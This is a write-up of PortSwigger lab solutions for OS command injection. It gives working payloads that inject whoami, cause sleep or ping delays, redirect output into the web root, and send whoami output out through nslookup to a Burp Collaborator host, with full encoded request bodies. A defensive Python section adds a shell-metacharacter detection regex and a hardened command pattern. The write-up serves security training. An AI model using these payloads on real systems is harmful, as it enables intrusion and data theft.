OS command injection - PortSwigger

OS command injection, simple case

Goal: execute the whoami command to determine the name of the current user.

  • intercept and modify a request that checks the stock level.

  • append |whoami or ;whoami to the storeId parameter

  • you can also use productId=1%26+whoami+%23&storeId=1, which is the URL-encoded form of productId=1& whoami #&storeId=1 (the # comments out the rest of the command line)

  • check the name in the response





Blind OS command injection with time delays

Goal: exploit the blind OS command injection vulnerability to cause a 10-second delay.

  • go to submit feedback

  • I tried a lot of payloads in different parameters, and finally these payloads solved the lab:
    
    karim&`ping -c 10 127.0.0.1`#&
    OR
    karim&`sleep 10`#&
    
  • put either one in the name or email parameter and send the request




Blind OS command injection with output redirection

Goal: execute the whoami command and retrieve the output.

  • go to submit feedback

  • send the payload from the previous lab, %26+sleep+10+%23+ (URL-encoded & sleep 10 #), in the email parameter

  • notice that it takes 10 seconds to respond, so this parameter is vulnerable

  • append the following payload to the email parameter, URL-encoded:
    
    & whoami > /var/www/images/whoami.txt #
    
  • open any image in a new tab and replace its filename with whoami.txt




Blind OS command injection with out-of-band interaction

Goal: exploit the blind OS command injection vulnerability to issue a DNS lookup to Burp Collaborator.

  • go to submit feedback

  • submit any values

  • in the Burp Collaborator client, click Copy to clipboard

  • send the POST /feedback/submit request to Burp Repeater

  • add the payload to the email parameter (we know from the previous labs that this is the vulnerable parameter)
    
    &nslookup <your_own>.burpcollaborator.net #&
    
  • but encode it with URL encoding

  • the request body will look like this:
    
    csrf=UfTw8aBwMGPhF6MGrJy2VBawdAB06GQ5&name=karim&email=123%40gmail.com%26nslookup%20y21kg9ifjgutl206yib4mhvtrkxdl2.burpcollaborator.net%20%23&subject=123&message=123
    



  • send the request

  • if you go to the Burp Collaborator client and click Poll now, you will see the DNS request to your domain





Blind OS command injection with out-of-band data exfiltration

Goal: execute the whoami command and exfiltrate the output via a DNS query to Burp Collaborator.

  • go to submit feedback

  • submit any values

  • in the Burp Collaborator client, click Copy to clipboard

  • send the POST /feedback/submit request to Burp Repeater

  • add the payload to the email parameter (we know from the previous labs that this is the vulnerable parameter)
    
    & nslookup `whoami`.79etnipoqp12sb7f5ridtq22yt4nsc.burpcollaborator.net #&
    
  • but encode it with URL encoding

  • the request body will look like this:
    
    csrf=5mJNRXmKKLVevRpFlC9NqvcKUm5LwMJH&name=karim&email=123%40g.com%26%20nslookup%20%60whoami%60.79etnipoqp12sb7f5ridtq22yt4nsc.burpcollaborator.net%20%23&subject=123&message=123
    
  • send the request

  • if you go to the Burp Collaborator client and click Poll now, you will see the DNS request to your domain
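As an added example (not part of the original write-up), here is the defender's side of the stock-check and feedback labs above in Python: the request bodies decoded the way the server sees them, a check that flags parameters carrying shell metacharacters, and the string-concatenation pattern that makes the stock check injectable next to a hardened argv-based version. The stockreport.pl helper name, the csrf token and the Collaborator subdomain are placeholders, not values from the labs.

```python
import re
from urllib.parse import parse_qs

# Shell metacharacters used across the labs above: & | ; ` $( and the # comment.
SHELL_META = re.compile(r"[&|;`#\n]|\$\(")
# ASCII digits only: str.isdigit() would also accept characters such as "\u00b2".
DIGITS = re.compile(r"[0-9]+")


def decoded_params(body: str) -> dict:
    """URL-decode a form body into {name: value}, as the server sees it."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def suspicious_params(body: str) -> dict:
    """Detection heuristic: decoded parameters containing a shell metacharacter."""
    return {k: v for k, v in decoded_params(body).items() if SHELL_META.search(v)}


def stock_command_unsafe(product_id: str, store_id: str) -> str:
    """Vulnerable pattern: raw parameters concatenated into one string that a
    server would hand to `sh -c`. Built here for comparison only, never executed."""
    return f"stockreport.pl {product_id} {store_id}"


def stock_command_safe(product_id: str, store_id: str) -> list:
    """Hardened pattern: allow-list validation, then an argv list so no shell
    ever parses the values. stockreport.pl is a hypothetical helper name."""
    if not (DIGITS.fullmatch(product_id) and DIGITS.fullmatch(store_id)):
        raise ValueError("productId and storeId must be decimal integers")
    return ["stockreport.pl", product_id, store_id]


# Constructed request bodies built from the lab payloads; the csrf token and
# the Collaborator subdomain are placeholders, not real values.
STOCK_BODY = "productId=1%26+whoami+%23&storeId=1"
FEEDBACK_BODY = ("csrf=TOKEN&name=karim&email=123%40gmail.com%26nslookup%20"
                 "PLACEHOLDER.burpcollaborator.net%20%23&subject=123&message=123")

if __name__ == "__main__":
    for body in (STOCK_BODY, FEEDBACK_BODY):
        print("flagged:", suspicious_params(body))
    p = decoded_params(STOCK_BODY)
    print("unsafe:", stock_command_unsafe(p["productId"], p["storeId"]))
    try:
        stock_command_safe(p["productId"], p["storeId"])
    except ValueError as e:
        print("safe rejected:", e)
```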



This post is licensed under CC BY 4.0 by the author.